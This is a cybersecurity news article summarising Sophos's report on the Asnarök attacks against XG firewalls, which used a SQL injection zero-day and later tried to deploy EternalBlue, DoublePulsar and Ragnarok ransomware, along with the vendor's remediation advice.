Thursday, May 26, 2022
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Glossary
  • Community Forum
  • Web Hosting Directory
  • Login
  • Register
Cloud7 News
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • How-Tos
    • Network/Internet
    • Windows
    • Software
    • Hardware
    • Blockchain
    • Policy/Legislation
    • Video
No Result
View All Result
Cloud7 News
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • How-Tos
    • Network/Internet
    • Windows
    • Software
    • Hardware
    • Blockchain
    • Policy/Legislation
    • Video
No Result
View All Result
Cloud7 News
No Result
View All Result

Home > Cybersecurity > Hackers try many ways to attack Sophos firewalls

Hackers try many ways to attack Sophos firewalls

Sophos published a second report about a recent series of attacks that tried to exploit a zero-day vulnerability in its XG firewall product. The attacks have been modified in three ways.

Seda Nur Cinar by Seda Nur Cinar
May 22, 2020
in Cybersecurity
2 min read
0 0
0
Hackers try many ways to attack Sophos firewalls
0
SHARES
18
VIEWS
Share on FacebookShare on TwitterShare on EmailFollow on Google News

Sophos published a second report about Asnarök attacks on firewalls. One month after hotfixes rolled out, Asnarök attackers twice modified attack midstream. Sophos and its customers have been attacked by an unknown adversary between April 22 and April 26. This attack revealed a previously unknown SQL injection vulnerability that led to remote code execution on some of our firewall products.

First phase of the attack
First phase of the attack

The new phase of the attack

Sophos’ internal security teams published a report about this attack. After Sophos issued a hotfix, the attackers panicked and modified their attack routine to replace their original data-stealing payload and deploy ransomware on corporate networks protected by Sophos firewalls. Firewalls that received the hotfix blocked the subsequent attempts to install ransomware.

The hackers were using the zero-day vulnerability to attack the firewall’s built-in PostgreSQL database server and plant malware on the device. The company was named it Asnarök and started to work on hotfixes. Four days after the attack has been discovered, Sophos released hotfixes for XG firewalls.

These hotfixes pushed to all firewalls that had the auto-update option left enabled. The Sophos hotfixes closed off the SQL injection vulnerability to subsequent exploitation, but the company published a second report which says that Asnarök attackers twice modified attack midstream. Sophos said that they have already taken additional steps to intervene that disrupted this phase of the attack.

flow-diagram-2nd-version

In the first phase of the attack, attackers inserted a single line of Linux code into a database; the effect being that a shell script named Install.sh was downloaded to, and executed, on the firewall. The new attack has three types:

  • EternalBlue: Windows SMB exploits to allow attackers to infect computers on the internal network beyond the firewall.
  • DoublePulsar: Windows kernel implant to grant attackers a foothold on computers on the internal network.
  • Ragnarok: a crypto-ransomware strain, a less common threat than other ransomware.

Sophos recommends to customers with impacted firewalls to reset passwords and to follow the remediation instructions contained in KBA135412. It is also important to keep machines inside the firewall perimeter up to date.

See more Cyber Security News


Tags: Cyber AttackSophos
ShareTweetSendShare
Get free daily newsletters from Cloud7 News Get the Cloud7 Newsletter

Check your inbox or spam folder to confirm your subscription.

By subscribing, you agree to our
Copyright Policy and Privacy Policy
Previous Post

Scala Data Centers to start construction on data center In São Paulo

Next Post

Check Point releases solution for Linux memory vulnerability

Seda Nur Cinar

Seda Nur Cinar

Seda Nur Cinar is the news editor of the Cloud7 News. With more than 8 years of Linux and cloud experience, Seda is a Linux and opensource enthusiast, security researcher and a web application developer.

Related News

VMware ESXi servers are being targeted by a new ransomware

VMware ESXi servers are being targeted by a new ransomware

May 26, 2022 2:07 pm
StackPatch unveils new WAF packages

StackPath unveils new WAF packages

May 24, 2022 4:56 pm

Word files embedded in PDF files are carrying keyloggers

May 24, 2022 2:24 pm
QNAP NAS devices are vulnerable once more

QNAP NAS devices are vulnerable once more

May 24, 2022 2:14 pm
Next Post
Check Point release solution for Linux memory corruption

Check Point releases solution for Linux memory vulnerability

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

I agree to the Terms & Conditions and Privacy Policy.

Editor's Choice

Interview with Igor Seletskiy on AlmaLinux

7 best hosting control panels

How to update Linux Kernel without rebooting?

7 best Linux mail servers for 2022

7 best cPanel alternatives for 2022

7 best Linux web browsers for 2022

cPanel Security: 7 steps to secure cPanel

7 best CentOS alternatives

7 best Linux server distros for 2022

How to scan your server for Log4j (Log4Shell) vulnerability

Best web hosting service providers

AlmaLinux 8.6 Stable is ready to download

Ubuntu 22.04 LTS is available for download. What is new?

Advertisement

Recent News

  • Broadcom is acquiring VMware for $61 billion
  • Clonezilla live 3.0.0-26 released
  • HP and System76 introduce high-end laptop
  • Windows Server 2022 supports WSL 2 distros
  • InMotion Hosting introduces upgraded VPS hosting plans

Our Latest Interview

Interview: Erez Barak, Vice President Observability of Sumo Logic
Interview

Interview: Erez Barak, Vice President Observability of Sumo Logic

by Atalay Kelestemur
November 25, 2021 3:23 am


Cloud7 News is a news source that publishes the latest news, industry news and exclusive interviews on web hosting, cloud computing, data center, cybersecurity and linux.

News Categories

  • Web Hosting
  • Cloud Computing
  • Data Center
  • Cybersecurity
  • Linux
  • Network/Internet
  • Software
  • Hardware
  • Blockchain

Our Free Modules

  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Glossary
  • Community Forum
  • Web Hosting Directory

Get the Cloud7 Newsletter

Get FREE daily newsletters from Cloud7 delivering the latest news and reviews.

  • About Us
  • Privacy & Policy
  • Copyright Policy
  • Contact

© 2022, Cloud7 News. Latest Cloud Computing, Web Hosting, Data Center Industry and Tech News

No Result
View All Result
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • How-Tos
    • Network/Internet
    • Windows
    • Software
    • Hardware
    • Blockchain
    • Policy/Legislation
    • Video
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Glossary
  • Community Forum
  • Web Hosting Directory

© 2022, Cloud7 News. Latest Cloud Computing, Web Hosting, Data Center Industry and Tech News

Welcome Back!

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Fill the forms below to register

*By registering into our website, you agree to the Terms & Conditions and Privacy Policy.
All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.